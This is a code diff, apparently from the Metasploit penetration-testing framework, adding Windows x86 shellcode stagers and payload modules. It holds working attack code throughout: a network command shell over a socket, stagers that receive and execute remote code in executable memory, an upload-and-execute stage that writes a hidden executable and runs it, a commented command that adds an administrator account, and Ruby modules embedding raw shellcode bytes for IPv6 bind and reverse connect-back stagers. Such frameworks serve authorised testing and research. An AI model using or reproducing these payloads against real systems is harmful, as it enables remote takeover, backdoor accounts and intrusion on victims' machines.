--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm
@@ -0,0 +1,74 @@
+;      Title:  Win32 Socket Initialization (connect)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_CONNECT  [ebp + 32]
+%define FN_WSASOCK  [ebp + 36]
+%define FN_WSASTART [ebp + 40]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x60aaf9ec ; connect     [ebp + 32]
+dd 0xadf509d9 ; WSASocketA  [ebp + 36]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 40]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+	call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x05      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+	push esp
+	push dword [edi]
+	call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,2,0,0,0,0) 
+	push eax
+	push eax
+	push eax
+	push eax
+    inc eax
+    inc eax
+    push eax
+    push eax
+	call FN_WSASOCK
+    mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm
new file mode 100644
index 0000000000..c052dfae94
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm
@@ -0,0 +1,32 @@
+
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+LFindGetProcAddress:
+    push dword [ebp] ; kernel32.dll
+    push 0x7c0dfcaa  ; GetProcAddress
+    call [ebp + 4]
+
+LSend: ; send(s, data, len, flags);
+    push eax              ; GetProcAddress
+    push dword [ebp + 8]  ; LoadLibraryA
+    mov ecx, esp
+    push byte 0x00          ; flags
+    push byte 8             ; length
+    push ecx                ; buffer
+    push edi                ; socket
+    call FN_SEND            ; send()
+
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    sub esp, 4096
+    mov ebx, esp
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
diff --git a/external/source/shellcode/windows/msf2/win32_stage_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_revert.asm
new file mode 100644
index 0000000000..1d6993515b
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_revert.asm
@@ -0,0 +1,19 @@
+;      Title:  Win32 RevertToSelf Stub
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+call LLoadAdvapi
+
+LAVDataSegment:
+db "ADVAPI32", 0x00
+
+LLoadAdvapi
+    call [ebp + 8]  ; call LoadLibraryA("ADVAPI32.DLL")     
+    push eax        ; Module base 
+    push 0x50dec82a ; RevertToSelf
+    call [ebp + 4]  ; Find address
+    call eax        ; Call it
diff --git a/external/source/shellcode/windows/msf2/win32_stage_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_shell.asm
new file mode 100644
index 0000000000..58d3113d2e
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_shell.asm
@@ -0,0 +1,78 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; edi        = socket
+
+LSetCommand:
+    push "CMD"
+    mov ebx, esp
+        
+LCreateProcessStructs:
+    xchg edi, edx       ; save edi to edx
+    xor eax,eax         ; overwrite with null
+    lea edi, [esp-84]   ; struct sizes
+    push byte 21        ; 21 * 4 = 84
+    pop ecx             ; set counter
+    
+LBZero:
+	rep stosd           ; overwrite with null
+    xchg edi, edx       ; restore edi
+    
+LCreateStructs:
+	sub esp, 84
+    mov byte [esp + 16], 68	    ; si.cb = sizeof(si) 
+	mov word [esp + 60], 0x0101 ; si.dwflags
+    
+	; socket handles 
+	mov [esp + 16 + 56], edi
+	mov [esp + 16 + 60], edi
+	mov [esp + 16 + 64], edi
+
+	lea eax, [esp + 16]	; si 
+	push esp			; pi 
+	push eax
+	push ecx
+	push ecx
+	push ecx
+    
+    inc ecx
+	push ecx
+    dec ecx
+    
+	push ecx
+	push ecx
+	push ebx
+	push ecx
+
+LCreateProcessA:
+    push dword [ebp] ; kernel32.dll
+    push 0x16b3fe72  ; CreateProcessA
+    call [ebp + 4]
+    call eax
+	mov esi, esp
+    
+LWaitForSingleObject:
+    push dword [ebp] ; kernel32.dll
+    push 0xce05d9ad  ; WaitForSingleObject
+    call [ebp + 4]
+    mov ebx, eax
+    
+    push 0xFFFFFFFF
+    push dword [esi]
+    call ebx
+    
+LDeathBecomesYou:
+    push dword [ebp] ; kernel32.dll
+    push 0x73e2d87e  ; ExitProcess
+    call [ebp + 4]
+    
+    xor ebx, ebx
+    push ebx
+    call eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm
new file mode 100644
index 0000000000..7bc1e962a7
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm
@@ -0,0 +1,174 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+%ifndef FN_RECV
+    %define FN_RECV     [ebp + 24]
+%endif
+
+%define BLOCKSZ 32
+
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; edi        = socket
+
+
+; ebx       = handle of temp file
+; esi       = bytes left to read
+; [ebp+100] = CreateFileA
+; [ebp+104] = WriteFile
+; [ebp+108] = CloseHandle
+; [ebp+112] = file name
+; [ebp+116] = recv buffer
+; [ebp+120] = remaining bytes
+; [ebp+124] = storage space
+
+ 
+LLoadFileAPI:  
+    push dword [ebp]
+    push 0x7c0017a5         ; CreateFileA
+    call [ebp + 4]
+    mov [ebp+100], eax
+    push dword [ebp]
+    push 0xe80a791f         ; WriteFile
+    call [ebp + 4]
+    mov [ebp+104], eax    
+    push dword [ebp]
+    push 0x0ffd97fb         ; CloseHandle
+    call [ebp + 4]
+    mov [ebp+108], eax    
+
+LReadFileLength: ; recv(s, buff, 4, 0)
+    lea eax, [ebp+120]
+    push byte 0x00          ; flags
+    push 4                  ; length
+    push eax                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    mov eax, [ebp+120]      ; remaining bytes
+    
+    call LGetFileName       ; get ptr to file name
+
+; temporary file name
+db "C:\metasploit.exe", 0x00
+
+LGetFileName:
+    pop ecx
+    mov [ebp+112], ecx
+
+LCreateFile:
+
+    push byte 0     ; template
+    push byte 6     ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
+    push byte 4     ; OPEN_ALWAYS
+    push byte 0     ; lpSecurityAttributes=null
+    push byte 7     ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE;
+    push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE
+    push ecx        ; file name
+    call [ebp+100]
+    mov ebx, eax     ; Handle in ebx
+
+LConfigBuffer:
+ ;   lea eax, [esp-BLOCKSZ-200] ; leave some room
+    sub esp, BLOCKSZ - 200
+
+;  shr eax, 2
+;  shl eax, 2
+    mov [ebp+116], esp  ; store it away
+    
+LReadSocket: ; recv(s, buff, 4096, 0)
+    mov eax, [ebp+116]      ; recv buffer ptr
+    push byte 0x00          ; flags
+    push BLOCKSZ            ; length
+    push eax                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    mov ecx, [ebp+120]      ; remaining bytes
+    sub ecx, eax            ; subtract recv
+    mov [ebp+120], ecx      ; put it back
+
+LWriteFile:
+    push esp                ; create storage
+    mov ecx, esp            ; get storage space
+    push byte 0             ; not overlapped
+    push ecx                ; &written
+    push eax                ; recv len
+    push dword [ebp+116]    ; source buffer
+    push ebx                ; file handle
+    call [ebp+104]          ; WriteFile
+    pop ecx                 ; remove storage
+
+    mov eax, [ebp+120]      ; remaining bytes
+    test eax, eax           ; are we at zero?
+    jnz LReadSocket         ; go read some more
+
+LCloseHandle:
+    push ebx
+    call [ebp+108]
+
+LCreateProcessStructs:
+    xchg edi, edx       ; save edi to edx
+    xor eax,eax         ; overwrite with null
+    lea edi, [esp-84]   ; struct sizes
+    push byte 21        ; 21 * 4 = 84
+    pop ecx             ; set counter
+    
+LBZero:
+	rep stosd           ; overwrite with null
+    xchg edi, edx       ; restore edi
+    
+LCreateStructs:
+	sub esp, 84
+    mov byte [esp + 16], 68	    ; si.cb = sizeof(si) 
+	mov word [esp + 60], 0x0101 ; si.dwflags
+    
+	; socket handles 
+	mov [esp + 16 + 56], edi
+	mov [esp + 16 + 60], edi
+	mov [esp + 16 + 64], edi
+
+	lea eax, [esp + 16]	; si 
+	push esp			; pi 
+	push eax
+	push ecx
+	push ecx
+	push ecx
+    
+    inc ecx
+	push ecx
+    dec ecx
+    
+	push ecx
+	push ecx
+	push dword [ebp+112]
+	push ecx
+
+LCreateProcessA:
+    push dword [ebp] ; kernel32.dll
+    push 0x16b3fe72  ; CreateProcessA
+    call [ebp + 4]
+    call eax
+	mov esi, esp
+    
+LWaitForSingleObject:
+    push dword [ebp] ; kernel32.dll
+    push 0xce05d9ad  ; WaitForSingleObject
+    call [ebp + 4]
+    mov ebx, eax
+    
+    push 0xFFFFFFFF
+    push dword [esi]
+    call ebx
+    
+LDeathBecomesYou:
+    push dword [ebp] ; kernel32.dll
+    push 0x73e2d87e  ; ExitProcess
+    call [ebp + 4]
+    
+    xor ebx, ebx
+    push ebx
+    call eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_winexec.asm b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm
new file mode 100644
index 0000000000..eeb4cc3364
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm
@@ -0,0 +1,34 @@
+;      Title:  Win32 Socket Initialization
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+jmp short GetCMD
+
+WinExec:
+    push ebx
+    push 0x0e8afe98
+    call esi
+    call eax
+
+
+ExitProcess:
+    push ebx
+    push 0x73e2d87e
+    call esi
+    push byte 0
+    call eax
+    call eax
+
+
+GetCMD:
+    push byte 0 ; last arg of WinExec
+    call WinExec
+
+; The command to execute
+;db "cmd.exe /c net user X X /ADD && net localgroups Administrators X /ADD"
+;db 0x00
diff --git a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
new file mode 100644
index 0000000000..68d66bfc52
--- /dev/null
+++ b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
@@ -0,0 +1,230 @@
+;      Title:  Windows Bind Stager (NX, IPv6)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  Metasploit LLC
+
+[BITS 32]
+
+global _start
+_start:
+
+    call LKernel32Base
+
+LGetProcAddress:
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi
+	cld
+
+LHshlp:
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+	xor eax, eax
+
+LDone:
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
+
+LKernel32Base:
+    pop esi
+    push byte 0x30
+    pop ecx
+    mov ebx, [fs:ecx]
+    mov ebx, [ebx + 0x0c] 
+    mov ebx, [ebx + 0x1c] 
+    mov ebx, [ebx]		  
+    mov ebx, [ebx + 0x08]
+
+    push ebx                ; kernel32.dll base
+    push dword 0xec0e4e8e   ; LoadLibraryA
+    call esi                ; GetProcAddress(kerne32.dll, LoadLibrary)
+    mov edi, eax
+	
+    push ebx                ; kernel32.dll base
+    push dword 0x91afca54   ; VirtualAlloc
+    call esi                ; GetProcAddress(kerne32.dll, VirtualAlloc)
+   
+    ; ebx = kernel32.dll base
+    ; esi = LGetProcAddress
+    ; edi = LoadLibraryA
+    ; eax = VirtualAlloc
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_ACCEPT   [ebp + 32]
+%define FN_BIND     [ebp + 36]
+%define FN_LISTEN   [ebp + 40]
+%define FN_WSASOCK  [ebp + 44]
+%define FN_WSASTART [ebp + 48]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x498649e5 ; accept      [ebp + 32]
+dd 0xc7701aa4 ; bind        [ebp + 36]
+dd 0xe92eada4 ; listen      [ebp + 40]
+dd 0xadf509d9 ; WSASocketA  [ebp + 44]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 48]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+    call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x07      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x0202, DATA)
+	sub esp, [edi]
+	push esp
+	push dword 0x0202
+	call FN_WSASTART
+	xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (23,1,6,0,0,0)
+	; dwFlags
+	push eax
+
+	; RESERVED
+	push eax
+	
+	; PROTOCOL INFO
+	push eax
+	
+	; PROTOCOL: IPPROTO_TCP
+	push byte 6
+	
+	; TYPE: SOCK_STREAM
+	push byte 1
+
+	; FAMILY: AF_INET6
+	push byte 23
+	
+	; WSASocket()
+	call FN_WSASOCK
+	mov edi, eax
+
+LBind:
+
+	; sin6_scope_id
+	push dword 0x00000000
+	xor ecx, ecx
+		
+	; sin6_addr = ::0
+	push ecx
+	push ecx
+	push ecx
+	push ecx
+	
+	; sin6_flowinfo
+	push ecx
+	
+	; sin6_port / sin6_family
+	push dword 0xffff0017
+
+    mov ecx, esp
+
+    push byte 28        ; length
+    push ecx
+    push edi
+    call FN_BIND
+
+    xor ebx, ebx
+	
+LListen:
+    push ebx
+    push edi
+    call FN_LISTEN
+
+LAccept:
+    push ebx
+    push ebx 
+    push edi
+    call FN_ACCEPT
+    mov edi, eax
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+
+	push byte      0x40
+	pop esi
+	push esi                ; PAGE_EXECUTE_READWRITE=0x40
+
+	shl esi, 6              ; MEM_COMMIT=0x1000
+	push esi
+
+	shl esi, 8              ; 1MB
+	push esi
+	
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push dword 4096         ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index 5db4bdd9a9..5b08379418 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -57,8 +57,12 @@ module ReverseTcp
 			raise 'tcp connectback can not be used with proxies'
 		end
 
+		# Switch to IPv6 ANY address if the LHOST is also IPv6
+		addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+		lsnr = (addr.length == 4) ? "0.0.0.0" : "::0"
+
 		self.listener_sock = Rex::Socket::TcpServer.create(
-			# 'LocalHost' => datastore['LHOST'],
+			'LocalHost' => lsnr,
 			'LocalPort' => datastore['LPORT'].to_i,
 			'Comm'      => comm,
 			'Context'   =>
diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index ced3a0ebfd..b87273cb53 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -267,9 +267,10 @@ class Payload < Msf::Module
 	#
 	# Supprted packing types:
 	#
-	# - ADDR (foo.com, 1.2.3.4)
-	# - HEX  (0x12345678, "\x41\x42\x43\x44")
-	# - RAW  (raw bytes)
+	# - ADDR  (foo.com, 1.2.3.4)
+	# - ADDR6 (foo.com, fe80::1234:5678:8910:1234)
+	# - HEX   (0x12345678, "\x41\x42\x43\x44")
+	# - RAW   (raw bytes)
 	#
 	def substitute_vars(raw, offsets)
 		offsets.each_pair { |name, info|
@@ -282,6 +283,19 @@ class Payload < Msf::Module
 			if ((val = datastore[name]))
 				if (pack == 'ADDR')
 					val = Rex::Socket.resolv_nbo(val)
+					
+					# Someone gave us a funky address (ipv6?)
+					if(val.length == 4)
+						raise RuntimeError, "IPv6 address specified for IPv4 payload"
+					end
+				elsif (pack == 'ADDR6')
+					val = Rex::Socket.resolv_nbo(val)
+					
+					# Convert v4 to the v6ish address
+					if(val.length == 4)
+						nip = "fe80::5efe:" + val.unpack("C*").join(".")
+						val = Rex::Socket.resolv_nbo(val)
+					end					
 				elsif (pack == 'RAW')
 					# Just use the raw value...
 				else
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
new file mode 100644
index 0000000000..7847754e2b
--- /dev/null
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb
@@ -0,0 +1,75 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Windows
+
+module BindTcpIPv6
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def self.handler_type_alias
+		"bind_ipv6_tcp"
+	end
+	
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection over IPv6',
+			'Author'        => ['hdm', 'skape'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Convention'    => 'sockedi',
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'   => [ 253+1, 'n' ],
+						},
+					'Payload' =>
+						"\xfc"+
+						"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+
+						"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+
+						"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+
+						"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
+						"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
+						"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
+						"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
+						"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
+						"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+
+						"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+
+						"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+
+						"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+
+						"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+
+						"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+
+						"\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+
+						"\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+
+						"\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+
+						"\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+
+						"\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+
+						"\x00\x53\x57\xff\x55\x18\xff\xd3"
+				}
+			))			
+	end
+
+end
+
+end end end end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
new file mode 100644
index 0000000000..54b24a002e
--- /dev/null
+++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
@@ -0,0 +1,81 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Windows
+
+module ReverseTcpIPv6
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+
+	def self.handler_type_alias
+		"reverse_ipv6_tcp"
+	end
+	
+	def initialize(info = {})
+
+		super(merge_info(info,
+			'Name'          => 'Reverse TCP Stager (IPv6)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to the attacker over IPv6',
+			'Author'        => ['hdm', 'skape'],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Convention'    => 'sockedi',
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LHOST'   => [ 246+1, 'ADDR6' ],
+							'LPORT'   => [ 240+1, 'n'     ],
+							'SCOPEID' => [ 262+1, 'V'     ]
+						},
+					'Payload' =>
+						"\xfc" +
+						"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+
+						"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+
+						"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+
+						"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
+						"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
+						"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
+						"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
+						"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
+						"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+
+						"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+
+						"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+
+						"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+
+						"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+
+						"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+
+						"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+
+						"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+
+						"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+
+						"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+
+						"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3"	
+				}
+			))
+		register_options(
+			[
+				OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0])
+			], self.class)		
+	end
+
+end
+
+end end end end